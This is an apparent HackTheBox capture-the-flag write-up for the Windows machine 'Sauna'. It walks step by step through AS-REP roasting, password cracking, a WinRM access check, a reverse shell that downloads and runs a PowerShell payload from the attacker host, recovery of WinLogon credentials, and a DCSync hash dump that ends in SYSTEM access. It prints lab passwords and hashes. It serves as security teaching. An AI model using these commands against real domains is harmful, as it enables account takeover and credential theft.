# Sauna - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Sauna was a pleasant, easy-rated HTB Windows machine created by [egotisticalSW](https://app.hackthebox.com/users/94858)

The user involved AS-REProasting and root involved WinLogon credentials.

## Initial recon

```console
opcode@parrot$ nmap -v -p- --min-rate 2000 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.088s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49695/tcp open  unknown
49718/tcp open  unknown
```

```console
opcode@parrot$ nmap -sC -sV -p 53,80,88,135,139,389,445,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49695,49718 -oN sauna.nmap 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.091s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-11-01 04:33:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49718/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-11-01T04:34:14
|_  start_date: N/A
|_clock-skew: 7h00m02s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
```

Several ports are open, including DNS, Kerberos, SMB, RPC, LDAP, and WinRM. It's likely a DC.

We can start with LDAP enumeration:

```console
opcode@parrot$ ldapsearch -x -H ldap://10.10.10.175 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL
ldapServiceName: EGOTISTICAL-BANK.LOCAL:sauna$@EGOTISTICAL-BANK.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
serverName: CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 98373
dsServiceName: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name
 ,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
dnsHostName: SAUNA.EGOTISTICAL-BANK.LOCAL
defaultNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL
currentTime: 20231101034347.0Z
configurationNamingContext: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
```

We have the FQDN `SAUNA.EGOTISTICAL-BANK.LOCAL` here; we can add it to `/etc/hosts`:

```text
10.10.10.175 SAUNA.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL SAUNA
```

## SMB enumeration

We can enumerate SMB shares. [CrackMapExec](https://github.com/mpgn/CrackMapExec) is my tool of choice these days:

```console
opcode@parrot$ docker run -it --entrypoint=/bin/bash --rm --name cmexec cme:latest
root@dbb706de9e25:~# echo '10.10.10.175 SAUNA.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL SAUNA' >> /etc/hosts
```

Testing for null session:

```console
root@dbb706de9e25:~# cme smb 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u '' -p '' --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\: 
SMB         10.10.10.175    445    SAUNA            [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Null sessions are disabled.

Testing for guest session:

```console
root@dbb706de9e25:~# cme smb 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'opcode' -p '' --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [-] EGOTISTICAL-BANK.LOCAL\opcode: STATUS_LOGON_FAILURE 
```

Guest sessions are disabled as well.

I also ran [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) for RPC enumeration but found nothing.

## Getting users from website

On <http://10.10.10.175/about.html>, we can find a bunch of usernames:

```console
opcode@parrot$ echo -e 'Fergus Smith\nHugo Bear\nSteven Kerb\nShaun Coins\nBowie Taylor\nSophie Driver' > names.txt
```

They can be potential users on the box. We do not know the account naming convention; therefore [Username Anarchy](https://github.com/urbanadventurer/username-anarchy) can be used:

```console
opcode@parrot$ git clone https://github.com/urbanadventurer/username-anarchy.git
opcode@parrot$ cd username-anarchy
opcode@parrot$ ./username-anarchy -i ~/names.txt > ~/user_formats.txt
```

Now, we can use [kerbrute](https://github.com/ropnop/kerbrute) to validate the usernames:

```console
opcode@parrot$ kerbrute userenum ~/user_formats.txt --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 11/01/23 - Ronnie Flathers @ropnop

2023/11/01 03:21:06 >  Using KDC(s):
2023/11/01 03:21:06 >  	10.10.10.175:88

2023/11/01 03:21:06 >  [+] VALID USERNAME:	 fsmith@EGOTISTICAL-BANK.LOCAL
2023/11/01 03:21:07 >  Done! Tested 88 usernames (1 valid) in 0.807 seconds
```

Only `fsmith` is valid.

## ASREProasting

With a known username, we can try roasting AS-REPs:

```console
opcode@parrot$ GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile users.txt
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b4d9de2442fe09539979298dfc54e198$b450e9c3cf687a8523b97c09ce6ccc1195a1fb76ae1f8e53f7570802c3e92b3d5f145a3406fe72c8234c6c808459ac33a635edaa8fcf40f73d6a3e0cc6aefd6c925adaf807c4eb2209db6ee04264de9f1586b26bfca9d39439caf9b3dec048a56ad4cfaeaba4599f5a87e35d5b28a117234570ec29d44b5ad6621e5eda2d897c4607dd787b2b7b207d7d3f35bfbbb4840a9ab406848a04727bba30075a6f6a355a99bda48a9287e5c9871a53c92ed4f34300a1727d4709aad36419577eb5a224fff3448ef2662177d632789c0d314e98c59a29184e9c845142015f83486947712267e6ebbbc1f73cd56bf5107b0178d46ee704efdb58587c74d14b3802e00400
```

We were right on the money; this account is AS-REProastable.  
Now crack the hash with `john`:

```console
opcode@parrot$ john/john --wordlist=/home/opcode/CTF/wordlists/rockyou.txt hash
```

It quickly cracks to `fsmith:Thestrokes23`

## Post-credential enumeration

Now that we have a set of credentials, we can enumerate more.  
Starting with SMB shares:

```console
root@dbb706de9e25:~# cme smb 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'fsmith' -p 'Thestrokes23' --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
SMB         10.10.10.175    445    SAUNA            [*] Enumerated shares
SMB         10.10.10.175    445    SAUNA            Share           Permissions     Remark
SMB         10.10.10.175    445    SAUNA            -----           -----------     ------
SMB         10.10.10.175    445    SAUNA            ADMIN$                          Remote Admin
SMB         10.10.10.175    445    SAUNA            C$                              Default share
SMB         10.10.10.175    445    SAUNA            IPC$            READ            Remote IPC
SMB         10.10.10.175    445    SAUNA            NETLOGON        READ            Logon server share 
SMB         10.10.10.175    445    SAUNA            print$          READ            Printer Drivers
SMB         10.10.10.175    445    SAUNA            RICOH Aficio SP 8300DN PCL 6                 We cant print money
SMB         10.10.10.175    445    SAUNA            SYSVOL          READ            Logon server share 
```

The `RICOH Aficio SP 8300DN PCL 6` share is interesting, but we cannot read it.  
I tried exploring `print$`, but nothing caught my eye.

WinRM is next:

```console
root@dbb706de9e25:~# cme winrm 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'fsmith' -p 'Thestrokes23'
HTTP        10.10.10.175    5985   SAUNA            [*] http://10.10.10.175:5985/wsman
HTTP        10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
```

We can already get a shell via WinRM.  
We can also check for user descriptions via LDAP:

```console
root@dbb706de9e25:~# cme ldap 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'fsmith' -p 'Thestrokes23' -M get-desc-users
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.175    389    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
GET-DESC... 10.10.10.175    389    SAUNA            [+] Found following users: 
GET-DESC... 10.10.10.175    389    SAUNA            User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.10.10.175    389    SAUNA            User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.10.10.175    389    SAUNA            User: krbtgt description: Key Distribution Center Service Account
```

There are a few more things that I like to check:

```console
root@dbb706de9e25:~# cme ldap 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'fsmith' -p 'Thestrokes23' -M adcs
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.175    389    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
ADCS        10.10.10.175    389    SAUNA            [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

root@dbb706de9e25:~# cme ldap 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'fsmith' -p 'Thestrokes23' -M maq
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.175    389    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
MAQ         10.10.10.175    389    SAUNA            [*] Getting the MachineAccountQuota
MAQ         10.10.10.175    389    SAUNA            MachineAccountQuota: 10

root@dbb706de9e25:~# cme ldap 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'fsmith' -p 'Thestrokes23' --trusted-for-delegation
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.175    389    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
LDAP        10.10.10.175    389    SAUNA            SAUNA$

root@dbb706de9e25:~# cme smb 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'fsmith' -p 'Thestrokes23' -M enum_av
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
ENUM_AV     10.10.10.175    445    SAUNA            Windows Defender INSTALLED
```

Also, some groups I like to check:

```console
root@dbb706de9e25:~# cme ldap 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'fsmith' -p 'Thestrokes23' -M group-mem -o group='Remote Management Users'
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.175    389    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
GROUP-ME... 10.10.10.175    389    SAUNA            [+] Found the following members of the Remote Management Users group:
GROUP-ME... 10.10.10.175    389    SAUNA            FSmith
GROUP-ME... 10.10.10.175    389    SAUNA            svc_loanmgr

root@dbb706de9e25:~# cme ldap 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'fsmith' -p 'Thestrokes23' -M group-mem -o group='Domain Admins'
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.175    389    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
GROUP-ME... 10.10.10.175    389    SAUNA            [+] Found the following members of the Domain Admins group:
GROUP-ME... 10.10.10.175    389    SAUNA            Administrator

root@dbb706de9e25:~# cme ldap 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'fsmith' -p 'Thestrokes23' -M group-mem -o group='Protected Users'
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.175    389    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 

root@dbb706de9e25:~# cme ldap 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'fsmith' -p 'Thestrokes23' -M group-mem -o group='Domain Computers'
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.175    389    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
```

We can get a shell now:

```console
root@dbb706de9e25:~# cme winrm 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u 'fsmith' -p 'Thestrokes23' -X 'IEX(IWR http://10.10.14.45:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.45 9001'
```

## Post-shell AD enumeration

```console
PS C:\> whoami
egotisticalbank\fsmith
PS C:\> whoami /all

USER INFORMATION
----------------

User Name              SID
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

Nothing useful here.

```console
PS C:\> netstat -ano -p TCP | findstr LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2900
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       484
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1188
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1640
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:49673          0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:49674          0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:49677          0.0.0.0:0              LISTENING       2848
  TCP    0.0.0.0:49682          0.0.0.0:0              LISTENING       616
  TCP    0.0.0.0:49695          0.0.0.0:0              LISTENING       3000
  TCP    0.0.0.0:49718          0.0.0.0:0              LISTENING       2956
  TCP    10.10.10.175:53        0.0.0.0:0              LISTENING       3000
  TCP    10.10.10.175:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       3000
```

No new ports either.

We can try running [adPEAS](https://github.com/61106960/adPEAS):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.45:8000/adPEAS.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-adPEAS
```

```text
[?] +++++ Checking DCSync Permissions +++++
[+] Filtering found identities that can perform DCSync in domain '': 
[+] The identity 'svc_loanmgr' is a non-default account and can DCSync a domain controller 
sAMAccountName:                         svc_loanmgr
userPrincipalName:                      svc_loanmgr@EGOTISTICAL-BANK.LOCAL
distinguishedName:                      CN=L Manager,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
objectSid:                              S-1-5-21-2966785786-3096785034-1186376766-1108
memberOf:                               CN=Remote Management Users,CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
pwdLastSet:                             01/24/2020 15:48:31 
lastLogonTimestamp:                     01/24/2020 16:05:02 
pserAccountControl:                     NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
```

The `svc_loanmgr` is the endgame.

`adPEAS` also generates bloodhound data. I set up an SMB server on my machine to transfer it:

```console
opcode@parrot$ sudo smbserver.py -username opcode -password opcode -smb2support crate `pwd`
```

And added it to the box with:

```console
PS C:\> net use \\10.10.14.45\crate opcode /user:opcode
The command completed successfully. 
```

Now, we can transfer the file:

```console
PS C:\> copy \Windows\Tasks\EGOTISTICAL-BANK.LOCAL_20231101060009_BloodHound.zip \\10.10.14.45\crate\
```

I started `neo4j`:

```console
opcode@parrot$ sudo neo4j console
```

And `Bloodhound`:

```console
opcode@parrot$ ./BloodHound --in-process-gpu
```

Starting with `fsmith`, I could not find any path to reach high-value targets.

I also tried placing `webshell.aspx` inside `\inetpub\webroot`, but we don't have the permissions:

```console
PS C:\> PS C:\> Get-Acl -Path C:\inetpub\wwwroot | Format-List  

Path   : Microsoft.PowerShell.Core\FileSystem::C:\inetpub\wwwroot 
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : NT AUTHORITY\LOCAL SERVICE Allow  FullControl
         NT AUTHORITY\LOCAL SERVICE Allow  268435456
         NT AUTHORITY\NETWORK SERVICE Allow  FullControl 
         NT AUTHORITY\NETWORK SERVICE Allow  268435456
         BUILTIN\IIS_IUSRS Allow  ReadAndExecute, Synchronize
         BUILTIN\IIS_IUSRS Allow  -1610612736
         NT SERVICE\TrustedInstaller Allow  FullControl
         NT SERVICE\TrustedInstaller Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  268435456
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
         BUILTIN\Users Allow  -1610612736
         CREATOR OWNER Allow  268435456
Audit  :
Sddl   : O:SYG:SYD:AI(A;;FA;;;LS)(A;OICIIO;GA;;;LS)(A;;FA;;;NS)(A;OICIIO;GA;;;NS)(A;;0x1200a9;;;IS)(A;OICIIO;GXGR;;;IS)(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478 
         464)(A;OICIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;ID;0x1200a9;;;BU)(A;OICII 
         OID;GXGR;;;BU)(A;OICIIOID;GA;;;CO)
```

Next, I tried [PrivescCheck](https://github.com/itm4n/PrivescCheck):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.45:8000/PrivescCheck.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-PrivescCheck
```

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0006 - Credential Access                        ┃
┃ NAME     ┃ WinLogon credentials                              ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether the 'WinLogon' registry key contains           ┃
┃ clear-text credentials. Note that entries with an empty      ┃
┃ password field are filtered out.                             ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Vulnerable - Medium


Domain   : EGOTISTICALBANK
Username : EGOTISTICALBANK\svc_loanmanager
Password : Moneymakestheworldgoround!
```

Therefore, we have another set of credentials.

## DCsync

`adPEAS` mentioned that `svc_loanmgr` can DCSync a domain controller.  
Therefore, we can dump hashes:

```console
opcode@parrot$ secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@SAUNA.EGOTISTICAL-BANK.LOCAL -just-dc
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:823b5f20581fb7c36d285d5060ba380e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:9bdf765aab8713ac2a51e9c2eef82f0ebff325369fcfcb176c5350722ee9f17b
SAUNA$:aes128-cts-hmac-sha1-96:e9b9f06478e8c8e02ba853547a78263f
SAUNA$:des-cbc-md5:89081f37f10d10fb
[*] Cleaning up... 
```

The administrator's hash or kerberos keys can be used with `psexec.py` to get a shell:

```console
opcode@parrot$ psexec.py EGOTISTICAL-BANK.LOCAL/administrator@SAUNA.EGOTISTICAL-BANK.LOCAL -hashes :823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Requesting shares on SAUNA.EGOTISTICAL-BANK.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file bSDVecCd.exe
[*] Opening SVCManager on SAUNA.EGOTISTICAL-BANK.LOCAL.....
[*] Creating service UpjR on SAUNA.EGOTISTICAL-BANK.LOCAL.....
[*] Starting service UpjR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```
